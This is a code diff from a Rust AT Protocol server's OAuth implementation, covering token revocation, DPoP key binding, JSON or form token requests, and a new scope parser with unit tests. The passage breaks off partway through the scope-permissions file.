} else if auth_request.parameters.dpop_jkt.is_some() {
96
return Err(OAuthError::InvalidRequest(
···
99
} else {
100
None
101
};
102
+
if let Err(e) = db::revoke_tokens_for_client(&state.db, &did, &auth_request.client_id).await {
103
+
tracing::warn!("Failed to revoke previous tokens for client: {:?}", e);
104
+
}
105
let token_id = TokenId::generate();
106
let refresh_token = RefreshToken::generate();
107
let now = Utc::now();
108
+
let access_token = create_access_token(
109
+
&token_id.0,
110
+
&did,
111
+
dpop_jkt.as_deref(),
112
+
auth_request.parameters.scope.as_deref(),
113
+
)?;
114
let token_data = TokenData {
115
did: did.clone(),
116
token_id: token_id.0.clone(),
···
190
));
191
}
192
if let Some(expected_jkt) = &token_data.parameters.dpop_jkt
193
+
&& &result.jkt != expected_jkt
194
+
{
195
+
return Err(OAuthError::InvalidDpopProof(
196
+
"DPoP key binding mismatch".to_string(),
197
+
));
198
+
}
199
Some(result.jkt)
200
} else if token_data.parameters.dpop_jkt.is_some() {
201
return Err(OAuthError::InvalidRequest(
···
215
new_expires_at,
216
)
217
.await?;
218
+
let access_token = create_access_token(
219
+
&new_token_id.0,
220
+
&token_data.did,
221
+
dpop_jkt.as_deref(),
222
+
token_data.scope.as_deref(),
223
+
)?;
224
let mut response_headers = HeaderMap::new();
225
let config = AuthConfig::get();
226
let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
+3
-1
src/oauth/endpoints/token/helpers.rs
+3
-1
src/oauth/endpoints/token/helpers.rs
···
36
token_id: &str,
37
sub: &str,
38
dpop_jkt: Option<&str>,
39
) -> Result<String, OAuthError> {
40
use serde_json::json;
41
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
42
let issuer = format!("https://{}", pds_hostname);
43
let now = Utc::now().timestamp();
44
let exp = now + ACCESS_TOKEN_EXPIRY_SECONDS;
45
let mut payload = json!({
46
"iss": issuer,
47
"sub": sub,
···
49
"iat": now,
50
"exp": exp,
51
"jti": token_id,
52
-
"scope": "atproto"
53
});
54
if let Some(jkt) = dpop_jkt {
55
payload["cnf"] = json!({ "jkt": jkt });
···
36
token_id: &str,
37
sub: &str,
38
dpop_jkt: Option<&str>,
39
+
scope: Option<&str>,
40
) -> Result<String, OAuthError> {
41
use serde_json::json;
42
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
43
let issuer = format!("https://{}", pds_hostname);
44
let now = Utc::now().timestamp();
45
let exp = now + ACCESS_TOKEN_EXPIRY_SECONDS;
46
+
let actual_scope = scope.unwrap_or("atproto");
47
let mut payload = json!({
48
"iss": issuer,
49
"sub": sub,
···
51
"iat": now,
52
"exp": exp,
53
"jti": token_id,
54
+
"scope": actual_scope
55
});
56
if let Some(jkt) = dpop_jkt {
57
payload["cnf"] = json!({ "jkt": jkt });
+27
-8
src/oauth/endpoints/token/mod.rs
+27
-8
src/oauth/endpoints/token/mod.rs
···
5
6
use crate::oauth::OAuthError;
7
use crate::state::{AppState, RateLimitKind};
8
-
use axum::{Form, Json, extract::State, http::HeaderMap};
9
10
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
11
pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce};
···
17
fn extract_client_ip(headers: &HeaderMap) -> String {
18
if let Some(forwarded) = headers.get("x-forwarded-for")
19
&& let Ok(value) = forwarded.to_str()
20
-
&& let Some(first_ip) = value.split(',').next() {
21
-
return first_ip.trim().to_string();
22
-
}
23
if let Some(real_ip) = headers.get("x-real-ip")
24
-
&& let Ok(value) = real_ip.to_str() {
25
-
return value.trim().to_string();
26
-
}
27
"unknown".to_string()
28
}
29
30
pub async fn token_endpoint(
31
State(state): State<AppState>,
32
headers: HeaderMap,
33
-
Form(request): Form<TokenRequest>,
34
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
35
let client_ip = extract_client_ip(&headers);
36
if !state
37
.check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
···
5
6
use crate::oauth::OAuthError;
7
use crate::state::{AppState, RateLimitKind};
8
+
use axum::body::Bytes;
9
+
use axum::{Json, extract::State, http::HeaderMap};
10
11
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
12
pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce};
···
18
fn extract_client_ip(headers: &HeaderMap) -> String {
19
if let Some(forwarded) = headers.get("x-forwarded-for")
20
&& let Ok(value) = forwarded.to_str()
21
+
&& let Some(first_ip) = value.split(',').next()
22
+
{
23
+
return first_ip.trim().to_string();
24
+
}
25
if let Some(real_ip) = headers.get("x-real-ip")
26
+
&& let Ok(value) = real_ip.to_str()
27
+
{
28
+
return value.trim().to_string();
29
+
}
30
"unknown".to_string()
31
}
32
33
pub async fn token_endpoint(
34
State(state): State<AppState>,
35
headers: HeaderMap,
36
+
body: Bytes,
37
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
38
+
let content_type = headers
39
+
.get("content-type")
40
+
.and_then(|v| v.to_str().ok())
41
+
.unwrap_or("");
42
+
let request: TokenRequest = if content_type.starts_with("application/json") {
43
+
serde_json::from_slice(&body)
44
+
.map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))?
45
+
} else if content_type.starts_with("application/x-www-form-urlencoded") {
46
+
serde_urlencoded::from_bytes(&body)
47
+
.map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))?
48
+
} else {
49
+
return Err(OAuthError::InvalidRequest(
50
+
"Content-Type must be application/json or application/x-www-form-urlencoded"
51
+
.to_string(),
52
+
));
53
+
};
54
let client_ip = extract_client_ip(&headers);
55
if !state
56
.check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
+2
-2
src/oauth/mod.rs
+2
-2
src/oauth/mod.rs
···
4
pub mod endpoints;
5
pub mod error;
6
pub mod jwks;
7
-
pub mod templates;
8
pub mod types;
9
pub mod verify;
10
11
pub use error::OAuthError;
12
-
pub use templates::{DeviceAccount, mask_email};
13
pub use types::*;
14
pub use verify::{
15
OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
···
4
pub mod endpoints;
5
pub mod error;
6
pub mod jwks;
7
+
pub mod scopes;
8
pub mod types;
9
pub mod verify;
10
11
pub use error::OAuthError;
12
+
pub use scopes::{AccountAction, AccountAttr, RepoAction, ScopeError, ScopePermissions};
13
pub use types::*;
14
pub use verify::{
15
OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
+134
src/oauth/scopes/definitions.rs
+134
src/oauth/scopes/definitions.rs
···
···
1
+
use std::collections::HashMap;
2
+
use std::sync::LazyLock;
3
+
4
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
5
+
pub enum ScopeCategory {
6
+
Core,
7
+
Transition,
8
+
Repo,
9
+
Blob,
10
+
Rpc,
11
+
Account,
12
+
}
13
+
14
+
impl ScopeCategory {
15
+
pub fn display_name(&self) -> &'static str {
16
+
match self {
17
+
ScopeCategory::Core => "Core Access",
18
+
ScopeCategory::Transition => "Transition",
19
+
ScopeCategory::Repo => "Repository",
20
+
ScopeCategory::Blob => "Media",
21
+
ScopeCategory::Rpc => "API Access",
22
+
ScopeCategory::Account => "Account",
23
+
}
24
+
}
25
+
}
26
+
27
+
#[derive(Debug, Clone)]
28
+
pub struct ScopeDefinition {
29
+
pub scope: &'static str,
30
+
pub category: ScopeCategory,
31
+
pub required: bool,
32
+
pub description: &'static str,
33
+
pub display_name: &'static str,
34
+
}
35
+
36
+
pub static SCOPE_DEFINITIONS: LazyLock<HashMap<&'static str, ScopeDefinition>> =
37
+
LazyLock::new(|| {
38
+
let definitions = vec![
39
+
ScopeDefinition {
40
+
scope: "atproto",
41
+
category: ScopeCategory::Core,
42
+
required: true,
43
+
description: "Use AT Protocol OAuth (required for all sessions)",
44
+
display_name: "AT Protocol",
45
+
},
46
+
ScopeDefinition {
47
+
scope: "transition:generic",
48
+
category: ScopeCategory::Transition,
49
+
required: false,
50
+
description: "Generic transition scope for compatibility",
51
+
display_name: "Transition Access",
52
+
},
53
+
ScopeDefinition {
54
+
scope: "transition:chat.bsky",
55
+
category: ScopeCategory::Transition,
56
+
required: false,
57
+
description: "Access to Bluesky chat features",
58
+
display_name: "Chat Access",
59
+
},
60
+
ScopeDefinition {
61
+
scope: "transition:email",
62
+
category: ScopeCategory::Account,
63
+
required: false,
64
+
description: "Read your account email address",
65
+
display_name: "Email Access",
66
+
},
67
+
ScopeDefinition {
68
+
scope: "repo:*?action=create",
69
+
category: ScopeCategory::Repo,
70
+
required: false,
71
+
description: "Create new records in your repository",
72
+
display_name: "Create Records",
73
+
},
74
+
ScopeDefinition {
75
+
scope: "repo:*?action=update",
76
+
category: ScopeCategory::Repo,
77
+
required: false,
78
+
description: "Update existing records in your repository",
79
+
display_name: "Update Records",
80
+
},
81
+
ScopeDefinition {
82
+
scope: "repo:*?action=delete",
83
+
category: ScopeCategory::Repo,
84
+
required: false,
85
+
description: "Delete records from your repository",
86
+
display_name: "Delete Records",
87
+
},
88
+
ScopeDefinition {
89
+
scope: "blob:*/*",
90
+
category: ScopeCategory::Blob,
91
+
required: false,
92
+
description: "Upload images, videos, and other media files",
93
+
display_name: "Upload Media",
94
+
},
95
+
];
96
+
97
+
definitions.into_iter().map(|d| (d.scope, d)).collect()
98
+
});
99
+
100
+
#[allow(dead_code)]
101
+
pub fn get_scope_definition(scope: &str) -> Option<&'static ScopeDefinition> {
102
+
SCOPE_DEFINITIONS.get(scope)
103
+
}
104
+
105
+
#[allow(dead_code)]
106
+
pub fn is_valid_scope(scope: &str) -> bool {
107
+
if SCOPE_DEFINITIONS.contains_key(scope) {
108
+
return true;
109
+
}
110
+
if scope.starts_with("ref:") {
111
+
return true;
112
+
}
113
+
false
114
+
}
115
+
116
+
#[allow(dead_code)]
117
+
pub fn get_required_scopes() -> Vec<&'static str> {
118
+
SCOPE_DEFINITIONS
119
+
.values()
120
+
.filter(|d| d.required)
121
+
.map(|d| d.scope)
122
+
.collect()
123
+
}
124
+
125
+
#[allow(dead_code)]
126
+
pub fn format_scope_for_display(scope: &str) -> String {
127
+
if let Some(def) = get_scope_definition(scope) {
128
+
def.description.to_string()
129
+
} else if scope.starts_with("ref:") {
130
+
"Referenced scope".to_string()
131
+
} else {
132
+
format!("Access to {}", scope)
133
+
}
134
+
}
+39
src/oauth/scopes/error.rs
+39
src/oauth/scopes/error.rs
···
···
1
+
use axum::http::StatusCode;
2
+
use axum::response::{IntoResponse, Response};
3
+
use serde_json::json;
4
+
5
+
#[derive(Debug, Clone)]
6
+
pub enum ScopeError {
7
+
InsufficientScope { required: String, message: String },
8
+
InvalidScope(String),
9
+
}
10
+
11
+
impl std::fmt::Display for ScopeError {
12
+
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
13
+
match self {
14
+
ScopeError::InsufficientScope { message, .. } => write!(f, "{}", message),
15
+
ScopeError::InvalidScope(msg) => write!(f, "Invalid scope: {}", msg),
16
+
}
17
+
}
18
+
}
19
+
20
+
impl std::error::Error for ScopeError {}
21
+
22
+
impl IntoResponse for ScopeError {
23
+
fn into_response(self) -> Response {
24
+
let (status, error_code, message) = match &self {
25
+
ScopeError::InsufficientScope { message, .. } => {
26
+
(StatusCode::FORBIDDEN, "InsufficientScope", message.clone())
27
+
}
28
+
ScopeError::InvalidScope(msg) => (StatusCode::BAD_REQUEST, "InvalidScope", msg.clone()),
29
+
};
30
+
(
31
+
status,
32
+
axum::Json(json!({
33
+
"error": error_code,
34
+
"message": message
35
+
})),
36
+
)
37
+
.into_response()
38
+
}
39
+
}
+12
src/oauth/scopes/mod.rs
+12
src/oauth/scopes/mod.rs
···
···
1
+
mod definitions;
2
+
mod error;
3
+
mod parser;
4
+
mod permissions;
5
+
6
+
pub use definitions::{SCOPE_DEFINITIONS, ScopeCategory, ScopeDefinition};
7
+
pub use error::ScopeError;
8
+
pub use parser::{
9
+
AccountAction, AccountAttr, AccountScope, BlobScope, IdentityAttr, IdentityScope, IncludeScope,
10
+
ParsedScope, RepoAction, RepoScope, RpcScope, parse_scope, parse_scope_string,
11
+
};
12
+
pub use permissions::ScopePermissions;
+483
src/oauth/scopes/parser.rs
+483
src/oauth/scopes/parser.rs
···
···
1
+
use std::collections::{HashMap, HashSet};
2
+
3
+
#[derive(Debug, Clone, PartialEq, Eq)]
4
+
pub enum ParsedScope {
5
+
Atproto,
6
+
TransitionGeneric,
7
+
TransitionChat,
8
+
TransitionEmail,
9
+
Repo(RepoScope),
10
+
Blob(BlobScope),
11
+
Rpc(RpcScope),
12
+
Account(AccountScope),
13
+
Identity(IdentityScope),
14
+
Include(IncludeScope),
15
+
Unknown(String),
16
+
}
17
+
18
+
#[derive(Debug, Clone, PartialEq, Eq)]
19
+
pub struct IncludeScope {
20
+
pub nsid: String,
21
+
pub aud: Option<String>,
22
+
}
23
+
24
+
#[derive(Debug, Clone, PartialEq, Eq)]
25
+
pub struct RepoScope {
26
+
pub collection: Option<String>,
27
+
pub actions: HashSet<RepoAction>,
28
+
}
29
+
30
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
31
+
pub enum RepoAction {
32
+
Create,
33
+
Update,
34
+
Delete,
35
+
}
36
+
37
+
impl RepoAction {
38
+
pub fn parse_str(s: &str) -> Option<Self> {
39
+
match s {
40
+
"create" => Some(Self::Create),
41
+
"update" => Some(Self::Update),
42
+
"delete" => Some(Self::Delete),
43
+
_ => None,
44
+
}
45
+
}
46
+
}
47
+
48
+
#[derive(Debug, Clone, PartialEq, Eq)]
49
+
pub struct BlobScope {
50
+
pub accept: HashSet<String>,
51
+
}
52
+
53
+
impl BlobScope {
54
+
pub fn matches_mime(&self, mime: &str) -> bool {
55
+
if self.accept.is_empty() || self.accept.contains("*/*") {
56
+
return true;
57
+
}
58
+
for pattern in &self.accept {
59
+
if pattern == mime {
60
+
return true;
61
+
}
62
+
if let Some(prefix) = pattern.strip_suffix("/*")
63
+
&& mime.starts_with(prefix)
64
+
&& mime.chars().nth(prefix.len()) == Some('/')
65
+
{
66
+
return true;
67
+
}
68
+
}
69
+
false
70
+
}
71
+
}
72
+
73
+
#[derive(Debug, Clone, PartialEq, Eq)]
74
+
pub struct RpcScope {
75
+
pub lxm: Option<String>,
76
+
pub aud: Option<String>,
77
+
}
78
+
79
+
#[derive(Debug, Clone, PartialEq, Eq)]
80
+
pub struct AccountScope {
81
+
pub attr: AccountAttr,
82
+
pub action: AccountAction,
83
+
}
84
+
85
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
86
+
pub enum AccountAttr {
87
+
Email,
88
+
Handle,
89
+
Repo,
90
+
Status,
91
+
}
92
+
93
+
#[derive(Debug, Clone, PartialEq, Eq)]
94
+
pub struct IdentityScope {
95
+
pub attr: IdentityAttr,
96
+
}
97
+
98
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
99
+
pub enum IdentityAttr {
100
+
Handle,
101
+
Wildcard,
102
+
}
103
+
104
+
impl AccountAttr {
105
+
pub fn parse_str(s: &str) -> Option<Self> {
106
+
match s {
107
+
"email" => Some(Self::Email),
108
+
"handle" => Some(Self::Handle),
109
+
"repo" => Some(Self::Repo),
110
+
"status" => Some(Self::Status),
111
+
_ => None,
112
+
}
113
+
}
114
+
}
115
+
116
+
impl IdentityAttr {
117
+
pub fn parse_str(s: &str) -> Option<Self> {
118
+
match s {
119
+
"handle" => Some(Self::Handle),
120
+
"*" => Some(Self::Wildcard),
121
+
_ => None,
122
+
}
123
+
}
124
+
}
125
+
126
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
127
+
pub enum AccountAction {
128
+
Read,
129
+
Manage,
130
+
}
131
+
132
+
impl AccountAction {
133
+
pub fn parse_str(s: &str) -> Option<Self> {
134
+
match s {
135
+
"read" => Some(Self::Read),
136
+
"manage" => Some(Self::Manage),
137
+
_ => None,
138
+
}
139
+
}
140
+
}
141
+
142
+
fn parse_query_params(query: &str) -> HashMap<String, Vec<String>> {
143
+
let mut params: HashMap<String, Vec<String>> = HashMap::new();
144
+
for part in query.split('&') {
145
+
if let Some((key, value)) = part.split_once('=') {
146
+
params
147
+
.entry(key.to_string())
148
+
.or_default()
149
+
.push(value.to_string());
150
+
}
151
+
}
152
+
params
153
+
}
154
+
155
+
pub fn parse_scope(scope: &str) -> ParsedScope {
156
+
match scope {
157
+
"atproto" => return ParsedScope::Atproto,
158
+
"transition:generic" => return ParsedScope::TransitionGeneric,
159
+
"transition:chat.bsky" => return ParsedScope::TransitionChat,
160
+
"transition:email" => return ParsedScope::TransitionEmail,
161
+
_ => {}
162
+
}
163
+
164
+
let (base, query) = scope.split_once('?').unwrap_or((scope, ""));
165
+
let params = parse_query_params(query);
166
+
167
+
if let Some(rest) = base.strip_prefix("repo:") {
168
+
let collection = if rest == "*" || rest.is_empty() {
169
+
None
170
+
} else {
171
+
Some(rest.to_string())
172
+
};
173
+
174
+
let mut actions = HashSet::new();
175
+
if let Some(action_values) = params.get("action") {
176
+
for action_str in action_values {
177
+
if let Some(action) = RepoAction::parse_str(action_str) {
178
+
actions.insert(action);
179
+
}
180
+
}
181
+
}
182
+
if actions.is_empty() {
183
+
actions.insert(RepoAction::Create);
184
+
actions.insert(RepoAction::Update);
185
+
actions.insert(RepoAction::Delete);
186
+
}
187
+
188
+
return ParsedScope::Repo(RepoScope {
189
+
collection,
190
+
actions,
191
+
});
192
+
}
193
+
194
+
if base == "repo" {
195
+
let mut actions = HashSet::new();
196
+
if let Some(action_values) = params.get("action") {
197
+
for action_str in action_values {
198
+
if let Some(action) = RepoAction::parse_str(action_str) {
199
+
actions.insert(action);
200
+
}
201
+
}
202
+
}
203
+
if actions.is_empty() {
204
+
actions.insert(RepoAction::Create);
205
+
actions.insert(RepoAction::Update);
206
+
actions.insert(RepoAction::Delete);
207
+
}
208
+
return ParsedScope::Repo(RepoScope {
209
+
collection: None,
210
+
actions,
211
+
});
212
+
}
213
+
214
+
if base.starts_with("blob") {
215
+
let positional = base.strip_prefix("blob:").unwrap_or("");
216
+
let mut accept = HashSet::new();
217
+
218
+
if !positional.is_empty() {
219
+
accept.insert(positional.to_string());
220
+
}
221
+
if let Some(accept_values) = params.get("accept") {
222
+
for v in accept_values {
223
+
accept.insert(v.to_string());
224
+
}
225
+
}
226
+
227
+
return ParsedScope::Blob(BlobScope { accept });
228
+
}
229
+
230
+
if base.starts_with("rpc") {
231
+
let lxm_positional = base.strip_prefix("rpc:").map(|s| s.to_string());
232
+
let lxm = lxm_positional.or_else(|| params.get("lxm").and_then(|v| v.first().cloned()));
233
+
let aud = params.get("aud").and_then(|v| v.first().cloned());
234
+
235
+
let is_lxm_wildcard = lxm.as_deref() == Some("*") || lxm.is_none();
236
+
let is_aud_wildcard = aud.as_deref() == Some("*");
237
+
if is_lxm_wildcard && is_aud_wildcard {
238
+
return ParsedScope::Unknown(scope.to_string());
239
+
}
240
+
241
+
return ParsedScope::Rpc(RpcScope { lxm, aud });
242
+
}
243
+
244
+
if let Some(attr_str) = base.strip_prefix("account:")
245
+
&& let Some(attr) = AccountAttr::parse_str(attr_str)
246
+
{
247
+
let action = params
248
+
.get("action")
249
+
.and_then(|v| v.first())
250
+
.and_then(|s| AccountAction::parse_str(s))
251
+
.unwrap_or(AccountAction::Read);
252
+
253
+
return ParsedScope::Account(AccountScope { attr, action });
254
+
}
255
+
256
+
if let Some(attr_str) = base.strip_prefix("identity:")
257
+
&& let Some(attr) = IdentityAttr::parse_str(attr_str)
258
+
{
259
+
return ParsedScope::Identity(IdentityScope { attr });
260
+
}
261
+
262
+
if let Some(nsid) = base.strip_prefix("include:") {
263
+
let aud = params.get("aud").and_then(|v| v.first().cloned());
264
+
return ParsedScope::Include(IncludeScope {
265
+
nsid: nsid.to_string(),
266
+
aud,
267
+
});
268
+
}
269
+
270
+
ParsedScope::Unknown(scope.to_string())
271
+
}
272
+
273
+
pub fn parse_scope_string(scope_str: &str) -> Vec<ParsedScope> {
274
+
scope_str.split_whitespace().map(parse_scope).collect()
275
+
}
276
+
277
+
#[cfg(test)]
278
+
mod tests {
279
+
use super::*;
280
+
281
+
#[test]
282
+
fn test_parse_atproto() {
283
+
assert_eq!(parse_scope("atproto"), ParsedScope::Atproto);
284
+
}
285
+
286
+
#[test]
287
+
fn test_parse_transition_scopes() {
288
+
assert_eq!(
289
+
parse_scope("transition:generic"),
290
+
ParsedScope::TransitionGeneric
291
+
);
292
+
assert_eq!(
293
+
parse_scope("transition:chat.bsky"),
294
+
ParsedScope::TransitionChat
295
+
);
296
+
assert_eq!(
297
+
parse_scope("transition:email"),
298
+
ParsedScope::TransitionEmail
299
+
);
300
+
}
301
+
302
+
#[test]
303
+
fn test_parse_repo_wildcard() {
304
+
let scope = parse_scope("repo:*?action=create");
305
+
match scope {
306
+
ParsedScope::Repo(r) => {
307
+
assert!(r.collection.is_none());
308
+
assert!(r.actions.contains(&RepoAction::Create));
309
+
assert!(!r.actions.contains(&RepoAction::Update));
310
+
}
311
+
_ => panic!("Expected Repo scope"),
312
+
}
313
+
}
314
+
315
+
#[test]
316
+
fn test_parse_repo_collection() {
317
+
let scope = parse_scope("repo:app.bsky.feed.post?action=create&action=delete");
318
+
match scope {
319
+
ParsedScope::Repo(r) => {
320
+
assert_eq!(r.collection, Some("app.bsky.feed.post".to_string()));
321
+
assert!(r.actions.contains(&RepoAction::Create));
322
+
assert!(r.actions.contains(&RepoAction::Delete));
323
+
assert!(!r.actions.contains(&RepoAction::Update));
324
+
}
325
+
_ => panic!("Expected Repo scope"),
326
+
}
327
+
}
328
+
329
+
#[test]
330
+
fn test_parse_repo_no_actions_means_all() {
331
+
let scope = parse_scope("repo:app.bsky.feed.post");
332
+
match scope {
333
+
ParsedScope::Repo(r) => {
334
+
assert!(r.actions.contains(&RepoAction::Create));
335
+
assert!(r.actions.contains(&RepoAction::Update));
336
+
assert!(r.actions.contains(&RepoAction::Delete));
337
+
}
338
+
_ => panic!("Expected Repo scope"),
339
+
}
340
+
}
341
+
342
+
#[test]
343
+
fn test_parse_blob_wildcard() {
344
+
let scope = parse_scope("blob:*/*");
345
+
match scope {
346
+
ParsedScope::Blob(b) => {
347
+
assert!(b.accept.contains("*/*"));
348
+
assert!(b.matches_mime("image/png"));
349
+
assert!(b.matches_mime("video/mp4"));
350
+
}
351
+
_ => panic!("Expected Blob scope"),
352
+
}
353
+
}
354
+
355
+
#[test]
356
+
fn test_parse_blob_specific() {
357
+
let scope = parse_scope("blob?accept=image/*&accept=video/*");
358
+
match scope {
359
+
ParsedScope::Blob(b) => {
360
+
assert!(b.matches_mime("image/png"));
361
+
assert!(b.matches_mime("image/jpeg"));
362
+
assert!(b.matches_mime("video/mp4"));
363
+
assert!(!b.matches_mime("text/plain"));
364
+
}
365
+
_ => panic!("Expected Blob scope"),
366
+
}
367
+
}
368
+
369
+
#[test]
370
+
fn test_parse_rpc() {
371
+
let scope = parse_scope("rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app");
372
+
match scope {
373
+
ParsedScope::Rpc(r) => {
374
+
assert_eq!(r.lxm, Some("app.bsky.feed.getTimeline".to_string()));
375
+
assert_eq!(r.aud, Some("did:web:api.bsky.app".to_string()));
376
+
}
377
+
_ => panic!("Expected Rpc scope"),
378
+
}
379
+
}
380
+
381
+
#[test]
382
+
fn test_parse_account() {
383
+
let scope = parse_scope("account:email?action=read");
384
+
match scope {
385
+
ParsedScope::Account(a) => {
386
+
assert_eq!(a.attr, AccountAttr::Email);
387
+
assert_eq!(a.action, AccountAction::Read);
388
+
}
389
+
_ => panic!("Expected Account scope"),
390
+
}
391
+
392
+
let scope2 = parse_scope("account:repo?action=manage");
393
+
match scope2 {
394
+
ParsedScope::Account(a) => {
395
+
assert_eq!(a.attr, AccountAttr::Repo);
396
+
assert_eq!(a.action, AccountAction::Manage);
397
+
}
398
+
_ => panic!("Expected Account scope"),
399
+
}
400
+
}
401
+
402
+
#[test]
403
+
fn test_parse_scope_string() {
404
+
let scopes = parse_scope_string("atproto repo:*?action=create blob:*/*");
405
+
assert_eq!(scopes.len(), 3);
406
+
assert_eq!(scopes[0], ParsedScope::Atproto);
407
+
match &scopes[1] {
408
+
ParsedScope::Repo(_) => {}
409
+
_ => panic!("Expected Repo"),
410
+
}
411
+
match &scopes[2] {
412
+
ParsedScope::Blob(_) => {}
413
+
_ => panic!("Expected Blob"),
414
+
}
415
+
}
416
+
417
+
#[test]
418
+
fn test_parse_include() {
419
+
let scope = parse_scope("include:app.bsky.authFullApp?aud=did:web:api.bsky.app");
420
+
match scope {
421
+
ParsedScope::Include(i) => {
422
+
assert_eq!(i.nsid, "app.bsky.authFullApp");
423
+
assert_eq!(i.aud, Some("did:web:api.bsky.app".to_string()));
424
+
}
425
+
_ => panic!("Expected Include scope"),
426
+
}
427
+
428
+
let scope2 = parse_scope("include:com.example.authBasicFeatures");
429
+
match scope2 {
430
+
ParsedScope::Include(i) => {
431
+
assert_eq!(i.nsid, "com.example.authBasicFeatures");
432
+
assert_eq!(i.aud, None);
433
+
}
434
+
_ => panic!("Expected Include scope"),
435
+
}
436
+
}
437
+
438
+
#[test]
439
+
fn test_parse_identity() {
440
+
let scope = parse_scope("identity:handle");
441
+
match scope {
442
+
ParsedScope::Identity(i) => {
443
+
assert_eq!(i.attr, IdentityAttr::Handle);
444
+
}
445
+
_ => panic!("Expected Identity scope"),
446
+
}
447
+
448
+
let scope2 = parse_scope("identity:*");
449
+
match scope2 {
450
+
ParsedScope::Identity(i) => {
451
+
assert_eq!(i.attr, IdentityAttr::Wildcard);
452
+
}
453
+
_ => panic!("Expected Identity scope"),
454
+
}
455
+
}
456
+
457
+
#[test]
458
+
fn test_parse_account_status() {
459
+
let scope = parse_scope("account:status?action=read");
460
+
match scope {
461
+
ParsedScope::Account(a) => {
462
+
assert_eq!(a.attr, AccountAttr::Status);
463
+
assert_eq!(a.action, AccountAction::Read);
464
+
}
465
+
_ => panic!("Expected Account scope"),
466
+
}
467
+
}
468
+
469
+
#[test]
470
+
fn test_rpc_wildcard_aud_forbidden() {
471
+
let scope = parse_scope("rpc:*?aud=*");
472
+
assert!(matches!(scope, ParsedScope::Unknown(_)));
473
+
474
+
let scope2 = parse_scope("rpc?aud=*");
475
+
assert!(matches!(scope2, ParsedScope::Unknown(_)));
476
+
477
+
let scope3 = parse_scope("rpc:app.bsky.feed.getTimeline?aud=*");
478
+
assert!(matches!(scope3, ParsedScope::Rpc(_)));
479
+
480
+
let scope4 = parse_scope("rpc:*?aud=did:web:api.bsky.app");
481
+
assert!(matches!(scope4, ParsedScope::Rpc(_)));
482
+
}
483
+
}
+488
src/oauth/scopes/permissions.rs
+488
src/oauth/scopes/permissions.rs
···
···
1
+
use super::error::ScopeError;
2
+
use super::parser::{
3
+
AccountAction, AccountAttr, BlobScope, IdentityAttr, IdentityScope, ParsedScope, RepoAction,
4
+
RepoScope, RpcScope, parse_scope_string,
5
+
};
6
+
use std::collections::HashSet;
7
+
8
+
#[derive(Debug, Clone)]
9
+
pub struct ScopePermissions {
10
+
scopes: HashSet<String>,
11
+
parsed: Vec<ParsedScope>,
12
+
has_atproto: bool,
13
+
has_transition_generic: bool,
14
+
has_transition_chat: bool,
15
+
has_transition_email: bool,
16
+
}
17
+
18
+
impl ScopePermissions {
19
+
pub fn from_scope_string(scope: Option<&str>) -> Self {
20
+
let scope_str = scope.unwrap_or("atproto");
21
+
let scopes: HashSet<String> = scope_str
22
+
.split_whitespace()
23
+
.map(|s| s.to_string())
24
+
.collect();
25
+
26
+
let parsed = parse_scope_string(scope_str);
27
+
28
+
let has_atproto = parsed.iter().any(|p| matches!(p, ParsedScope::Atproto));
29
+
let has_transition_generic = parsed
30
+
.iter()
31
+
.any(|p| matches!(p, ParsedScope::TransitionGeneric));
32
+
let has_transition_chat = parsed
33
+
.iter()
34
+
.any(|p| matches!(p, ParsedScope::TransitionChat));
35
+
let has_transition_email = parsed
36
+
.iter()
37
+
.any(|p| matches!(p, ParsedScope::TransitionEmail));
38
+
39
+
Self {
40
+
scopes,
41
+
parsed,
42
+
has_atproto,
43
+
has_transition_generic,
44
+
has_transition_chat,
45
+
has_transition_email,
46
+
}
47
+
}
48
+
49
+
pub fn has_scope(&self, scope: &str) -> bool {
50
+
self.scopes.contains(scope)
51
+
}
52
+
53
+
pub fn scopes(&self) -> &HashSet<String> {
54
+
&self.scopes
55
+
}
56
+
57
+
pub fn has_full_access(&self) -> bool {
58
+
self.has_atproto
59
+
}
60
+
61
+
fn find_repo_scopes(&self) -> impl Iterator<Item = &RepoScope> {
62
+
self.parsed.iter().filter_map(|p| {
63
+
if let ParsedScope::Repo(r) = p {
64
+
Some(r)
65
+
} else {
66
+
None
67
+
}
68
+
})
69
+
}
70
+
71
+
fn find_blob_scopes(&self) -> impl Iterator<Item = &BlobScope> {
72
+
self.parsed.iter().filter_map(|p| {
73
+
if let ParsedScope::Blob(b) = p {
74
+
Some(b)
75
+
} else {
76
+
None
77
+
}
78
+
})
79
+
}
80
+
81
+
fn find_rpc_scopes(&self) -> impl Iterator<Item = &RpcScope> {
82
+
self.parsed.iter().filter_map(|p| {
83
+
if let ParsedScope::Rpc(r) = p {
84
+
Some(r)
85
+
} else {
86
+
None
87
+
}
88
+
})
89
+
}
90
+
91
+
fn find_account_scopes(&self) -> impl Iterator<Item = &super::parser::AccountScope> {
92
+
self.parsed.iter().filter_map(|p| {
93
+
if let ParsedScope::Account(a) = p {
94
+
Some(a)
95
+
} else {
96
+
None
97
+
}
98
+
})
99
+
}
100
+
101
+
fn find_identity_scopes(&self) -> impl Iterator<Item = &IdentityScope> {
102
+
